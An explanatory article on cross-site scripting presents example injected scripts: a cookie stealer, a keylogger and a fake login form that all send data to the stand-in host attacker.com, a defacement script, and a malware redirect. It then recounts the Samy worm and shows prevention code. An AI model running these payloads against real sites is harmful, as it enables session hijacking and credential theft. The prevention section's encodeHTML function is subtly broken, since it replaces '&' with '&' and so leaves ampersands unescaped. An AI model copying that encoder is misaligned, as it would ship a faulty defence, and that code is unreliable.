Malicious Java Script examples

A malicious script injected via Cross-Site Scripting (XSS) can perform a variety of harmful actions. Here are examples of common malicious scripts and the potential consequences:

1. Session Hijacking

An attacker can steal session cookies, allowing them to impersonate a user. Here's an example script that sends the user's cookies to the attacker's server:

<script>
    var img = new Image();
    img.src = "http://attacker.com/steal?cookie=" + document.cookie;
</script>

Potential Consequences:

• Unauthorized access to user accounts.
• Data theft and privacy breaches.

2. Keylogging

An attacker can log the keystrokes of the user, capturing sensitive information like passwords and credit card numbers.

<script>
    document.onkeypress = function(e) {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://attacker.com/log?key=" + e.key, true);
        xhr.send();
    };
</script>

Potential Consequences:

• Theft of personal information.
• Compromise of user accounts and financial loss.

3. Phishing

An attacker can create fake login forms to trick users into entering their credentials.

<script>
    document.body.innerHTML = '<form action="http://attacker.com/login" method="POST">\
        <input type="text" name="username" placeholder="Username">\
        <input type="password" name="password" placeholder="Password">\
        <input type="submit" value="Login">\
    </form>';
</script>

Potential Consequences:

• Credential theft.
• Unauthorized access to user accounts.

4. Defacement

An attacker can modify the content of the webpage, damaging the reputation of the website.

<script>
    document.body.innerHTML = '<h1>Hacked by Attacker</h1>';
</script>

Potential Consequences:

• Damage to the website’s reputation.
• Loss of user trust.

5. Distribution of Malware

An attacker can use XSS to inject a script that downloads and executes malware on the user's machine.

<script>
    window.location.href = "http://attacker.com/malware.exe";
</script>

Potential Consequences:

• Compromise of user machines.
• Spread of malware.

Real-World Example

A real-world example of an XSS attack is the one that occurred on the MySpace social network in 2005, known as the Samy worm. The attacker, Samy Kamkar, exploited an XSS vulnerability to create a worm that spread rapidly by posting a self-replicating script to user profiles. When another user viewed an infected profile, the script would execute and post itself to the victim's profile as well. This led to over one million MySpace profiles being infected in a short period of time.

Prevention Measures

1. Output Encoding: Encode data before displaying it in the browser to ensure it is treated as text rather than executable code.

   function encodeHTML(str) {
       return str.replace(/&/g, '&')
                 .replace(/</g, '&lt;')
                 .replace(/>/g, '&gt;')
                 .replace(/"/g, '&quot;')
                 .replace(/'/g, '&#39;');
   }
   document.getElementById("results").innerHTML = "Search results for: " + encodeHTML(search);
   

2. Input Validation and Sanitization: Validate and sanitize user inputs to ensure they do not contain malicious code.

   function sanitizeInput(input) {
       return input.replace(/[^a-zA-Z0-9 ]/g, "");
   }
   var search = sanitizeInput(location.hash.substring(1));
   

3. Content Security Policy (CSP): Implement CSP to restrict the sources from which scripts can be executed.

   Content-Security-Policy: default-src 'self'; script-src 'self';
   

4. Use Secure JavaScript Methods: Use methods like textContent or createTextNode to avoid interpreting the input as HTML.

   var search = location.hash.substring(1);
   var textNode = document.createTextNode("Search results for: " + search);
   document.getElementById("results").appendChild(textNode);